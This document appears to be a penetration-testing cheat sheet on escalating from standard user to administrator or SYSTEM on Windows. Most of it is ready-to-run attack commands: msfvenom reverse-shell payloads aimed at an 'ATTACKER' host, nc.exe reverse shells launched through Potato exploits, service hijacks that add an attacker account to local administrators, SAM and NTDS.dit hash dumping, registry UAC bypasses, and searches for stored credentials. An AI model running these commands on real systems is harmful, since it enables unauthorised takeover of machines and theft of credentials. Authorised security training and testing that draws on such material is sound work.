Exploitation
Privilege Escalation
Escalate from standard user to local administrator or SYSTEM on Windows systems using misconfigurations and vulnerabilities.
Tool Installation
Enumeration Tools
Always start with automated enumeration to identify potential privilege escalation vectors.
WinPEAS
The most comprehensive Windows privilege escalation enumeration tool. Color-coded output highlights severity.
powershell
# Download WinPEAS
# https://github.com/carlospolop/PEASS-ng/releases
# Run full enumeration
.\winPEASany.exe quiet
# Run specific checks only
.\winPEASany.exe quiet servicesinfo applicationsinfo
.\winPEASany.exe quiet systeminfo userinfo
# Run without color (for logs)
.\winPEASany.exe quiet notcolor
# Colors: Red = 95% PE vector, Yellow = possible PE
# Focus on RED items firstPowerUp
PowerShell-based privilege escalation checker. Can also automatically exploit findings.
powershell
# Download from PowerSploit
# Bypass execution policy if needed
Set-ExecutionPolicy Bypass -Scope Process
# Import and run all checks
Import-Module .\PowerUp.ps1
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt
# Specific vulnerability checks
Get-ServiceUnquoted # Unquoted service paths
Get-ModifiableServiceFile # Writable service binaries
Get-ModifiableService # Modifiable service configs
Get-UnattendedInstallFile # Unattend.xml with creds
Get-ModifiableScheduledTaskFile # Writable scheduled tasks
Get-Webconfig # Web.config credentials
Get-ApplicationHost # IIS applicationHost.config
# Automatic exploitation
Invoke-ServiceAbuse -Name 'VulnService' -UserName 'corp\attacker'
Write-ServiceBinary -Name 'VulnService' -Path 'C:\temp\service.exe'Seatbelt
C# security-oriented host-survey tool. Great for situational awareness.
powershell
# Run all checks
Seatbelt.exe -group=all
# Specific check groups
Seatbelt.exe -group=user # User-related checks
Seatbelt.exe -group=system # System-related checks
Seatbelt.exe -group=misc # Miscellaneous checks
Seatbelt.exe -group=chrome # Chrome data
# Specific checks
Seatbelt.exe TokenPrivileges # Current token privileges
Seatbelt.exe WindowsCredentialFiles
Seatbelt.exe CredentialGuard
Seatbelt.exe InterestingFiles
# Remote execution
Seatbelt.exe -group=remote -computername=TARGETTip
Quick Start: Run WinPEAS first, then use PowerUp to attempt automatic exploitation of findings.
Service Misconfigurations
Services running as SYSTEM with weak permissions are common privilege escalation vectors.
Service Attack Types:
Unquoted Path- Spaces in path without quotesWeak Permissions- Modify service configurationWritable Binary- Replace the service executableDLL Hijacking- Missing DLLs in writable paths
Unquoted Service Paths
When a service path contains spaces and isn't quoted, Windows tries multiple executables.
powershell
# Find unquoted service paths
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """"
# PowerShell alternative
Get-WmiObject win32_service | Select-Object Name,PathName,StartMode | Where-Object {$_.PathName -notlike '"*"' -and $_.PathName -like '* *'}
# Example vulnerable path: C:\Program Files\My App\service.exe
# Windows tries in order:
# 1. C:\Program.exe
# 2. C:\Program Files\My.exe ← If you can write here
# 3. C:\Program Files\My App\service.exe
# Check write permissions on path
icacls "C:\Program Files"
icacls "C:\Program Files\My App"
# Exploit: Place malicious executable
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o My.exe
copy My.exe "C:\Program Files\My.exe"
# Restart service
sc stop VulnService
sc start VulnServiceWeak Service Permissions
If you can modify a service's configuration, you can change the binary path to your payload.
powershell
# Check service permissions with accesschk (Sysinternals)
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Everyone" *
accesschk.exe /accepteula -uwcqv "BUILTIN\Users" *
# Look for SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS
# Example output showing writable service:
# VulnService SERVICE_ALL_ACCESS
# Check specific service
accesschk.exe /accepteula -ucqv VulnService
sc qc VulnService # View current config
# Modify service binary path
sc config VulnService binpath= "C:\temp\shell.exe"
# Or add yourself as admin and revert
sc config VulnService binpath= "net localgroup administrators attacker /add"
sc stop VulnService
sc start VulnService
# PowerUp automatic exploitation
Invoke-ServiceAbuse -Name 'VulnService' -UserName 'corp\attacker'Writable Service Binary
powershell
# Check if service binary is writable
icacls "C:\Program Files\Service\app.exe"
# Replace binary with payload
move "C:\Program Files\Service\app.exe" "C:\Program Files\Service\app.exe.bak"
copy shell.exe "C:\Program Files\Service\app.exe"
sc stop ServiceName
sc start ServiceNameToken Manipulation
Windows tokens contain security information including privileges. Certain privileges allow escalation to SYSTEM.
| Privilege | Attack | Tool |
|---|---|---|
| SeImpersonatePrivilege | Potato attacks | PrintSpoofer, GodPotato |
| SeAssignPrimaryTokenPrivilege | Token manipulation | Potato attacks |
| SeBackupPrivilege | Read any file | robocopy /b, reg save |
| SeRestorePrivilege | Write any file | DLL hijacking |
| SeTakeOwnershipPrivilege | Take file ownership | takeown, icacls |
| SeDebugPrivilege | Debug processes | Mimikatz LSASS dump |
Check Current Privileges
powershell
# List current privileges
whoami /priv
# Check if privilege is enabled vs disabled
# Disabled privileges can often be enabled
# Enable all assigned privileges (PowerShell)
$id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$id.Token
# Common accounts with SeImpersonatePrivilege:
# - IIS AppPool accounts (web shells)
# - MSSQL service accounts
# - Service accounts running as NetworkService/LocalServicePotato Attacks (SeImpersonatePrivilege)
Potato attacks abuse Windows token impersonation to escalate to SYSTEM. Different variants work on different Windows versions.
Potato Version Guide:
PrintSpoofer- Windows 10 / Server 2016-2019 (best choice)GodPotato- Works on many versionsJuicyPotato- Windows 7-10 / Server 2008-2016RoguePotato- Windows 10 1809+SweetPotato- Collection of multiple techniques
powershell
# PrintSpoofer (Windows 10/Server 2019) - Recommended
# Download: https://github.com/itm4n/PrintSpoofer/releases
PrintSpoofer.exe -i -c cmd # Interactive shell
PrintSpoofer.exe -c "nc.exe ATTACKER 4444 -e cmd" # Reverse shell
# GodPotato (works on many versions)
# Download: https://github.com/BeichenDream/GodPotato/releases
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "nc.exe ATTACKER 4444 -e cmd.exe"
# JuicyPotato (older Windows - needs CLSID)
# Find CLSID: https://ohpe.it/juicy-potato/CLSID/
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}
# SweetPotato
SweetPotato.exe -p cmd.exe -a "/c whoami"
SweetPotato.exe -p nc.exe -a "ATTACKER 4444 -e cmd"SeBackupPrivilege Abuse
With SeBackupPrivilege, you can read any file on the system regardless of ACLs.
powershell
# Method 1: Registry backup (SAM/SYSTEM hashes)
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SECURITY C:\temp\SECURITY # LSA secrets
# Extract hashes offline
secretsdump.py -sam SAM -system SYSTEM LOCAL
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
# Method 2: Robocopy backup mode (any file)
robocopy /b C:\Windows\NTDS C:\temp ntds.dit
robocopy /b C:\Users\Administrator\Desktop C:\temp
# Method 3: diskshadow (copy locked files like NTDS.dit)
# Create script.txt:
# set context persistent nowriters
# add volume c: alias mydrive
# create
# expose %mydrive% x:
diskshadow /s script.txt
robocopy /b x:\Windows\NTDS C:\temp ntds.dit
# Then extract from NTDS.dit
secretsdump.py -ntds ntds.dit -system SYSTEM LOCALScheduled Tasks & Registry
Scheduled Task Abuse
powershell
# List scheduled tasks
schtasks /query /fo LIST /v
# Find writable task binaries
accesschk.exe /accepteula -dqv "C:\Task\Folder"
# Check autoruns
autorunsc.exe -a | findstr /n /R "File\ not\ found"AlwaysInstallElevated
If both registry keys are set to 1, any user can install MSI packages as SYSTEM.
powershell
# Check if AlwaysInstallElevated is enabled (both must be 1)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# PowerUp check
Get-RegistryAlwaysInstallElevated
# If both return 1, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f msi -o shell.msi
# Or create MSI to add admin user
msfvenom -p windows/adduser USER=attacker PASS=Password123! -f msi -o adduser.msi
# Install MSI (runs as SYSTEM)
msiexec /quiet /qn /i shell.msi
msiexec /quiet /qn /i C:\temp\shell.msi
# PowerUp automatic exploitation
Write-UserAddMSI # Creates UserAdd.msiUAC Bypass
UAC bypasses allow elevation from medium to high integrity without UAC prompt. Only works if user is already in Administrators group.
UAC Levels (EnableLUA key):
0- Never notify (UAC disabled)1- Always notify (most secure)2- Notify on app changes (default)5- Default + dim desktop
powershell
# Check UAC level
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
# Look for: EnableLUA, ConsentPromptBehaviorAdmin
# FodHelper bypass (Windows 10/11)
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -Value "" -Force
Set-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name "(Default)" -Value "cmd /c start powershell.exe" -Force
Start-Process fodhelper.exe -WindowStyle Hidden
# Cleanup
Remove-Item -Path HKCU:\Software\Classes\ms-settings -Recurse -Force
# ComputerDefaults bypass
New-Item -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "(Default)" -Value "cmd /c start powershell" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Start-Process "C:\Windows\System32\ComputerDefaults.exe"
# UACME - 70+ bypass methods
# https://github.com/hfiref0x/UACME
akagi64.exe 61 cmd.exeCredential Files
Credentials are often stored in plaintext or weakly encrypted in common locations.
powershell
# Search for password in files
findstr /si password *.txt *.ini *.config *.xml *.ps1 *.bat
findstr /si pwd *.txt *.ini *.config *.xml
findstr /si credential *.txt *.ini *.config *.xml
# Unattend/Sysprep files (often contain admin passwords)
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\unattend\Unattend.xml
C:\Windows\system32\sysprep\sysprep.xml
C:\Windows\system32\sysprep\unattend.xml
# IIS config
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
# PowerShell history
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Get-Content (Get-PSReadLineOption).HistorySavePath
# Saved Windows credentials
cmdkey /list
# If admin creds saved, use:
runas /savecred /user:Administrator cmd.exe
# WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="SSID" key=clear
# Group Policy Preferences (cpassword)
findstr /S /I cpassword \\domain.local\sysvol\*.xmlExternal Resources
PEASS-ng (WinPEAS) - GitHub
Privilege Escalation Awesome Scripts Suite
HackTricks - Windows PrivEsc
Comprehensive Windows privilege escalation guide
PrintSpoofer - GitHub
Potato attack for Windows 10/Server 2019
UACME - GitHub
70+ UAC bypass methods
FuzzySecurity - Windows PrivEsc
Classic Windows privilege escalation fundamentals
Seatbelt - GitHub
Security-oriented host-survey tool
Tip
Always run WinPEAS first to get an overview of potential privilege escalation vectors, then focus on the most promising ones.